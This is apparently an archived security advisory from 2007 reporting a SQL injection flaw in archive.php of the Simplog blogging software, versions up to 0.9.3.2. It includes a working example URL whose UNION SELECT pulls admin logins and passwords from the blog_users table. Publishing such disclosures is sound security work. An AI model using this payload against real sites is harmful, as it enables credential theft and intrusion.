simplog0932.txt

simplog0932.txt: Posted Jan 2, 2007; Authored by DrFrancky | Site securitydot.net; Simplog versions 0.9.3.2 and below suffer from a SQL injection vulnerability in archive.php.; tags | exploit, php, sql injection; SHA-256 | 6d9122a3931415b02d520d35f86bf51857269aa39811c89199da9038f93f79e9; Download | Favorite | View

simplog0932.txt

Afected Software:
simplog up to 0.9.3.2 (latest version - 12/05/2006 )

Site:
http://www.simplog.org
Simplog provides an easy way for users to add blogging capabilities to
their existing websites. Simplog is written in PHP and compatible with
multiple databases. Simplog also features an RSS/Atom aggregator/reader.
Powerful, yet simple

Vulnerability:
SQL Injection in archive.php
other files probably also affected

Example:
http://example.com/simplog/archive.php?blogid=1&pid=1111%20union%20select%201,1,1,login,1,password,1,1%20from%20blog_users%20where%20admin=1

Vendor status:
NOT NOTIFIED


Javor Ninov aka DrFrancky
drfrancky shift+2 securax.org
http://securitydot.net/

Top Authors In Last 30 Days

Red Hat 231 files
indoushka 108 files
Ubuntu 86 files
Gentoo 36 files
Jasper Nota 25 files
Debian 19 files
Willem Westerhof 19 files
Jim Blankendaal 11 files
Martijn Baalman 9 files
Apple 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,100)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,789)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,546)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,754)
UNIX (9,437)
UnixWare (187)
Windows (6,674)
Other

simplog0932.txt

simplog0932.txt

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

simplog0932.txt

Share This

simplog0932.txt

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems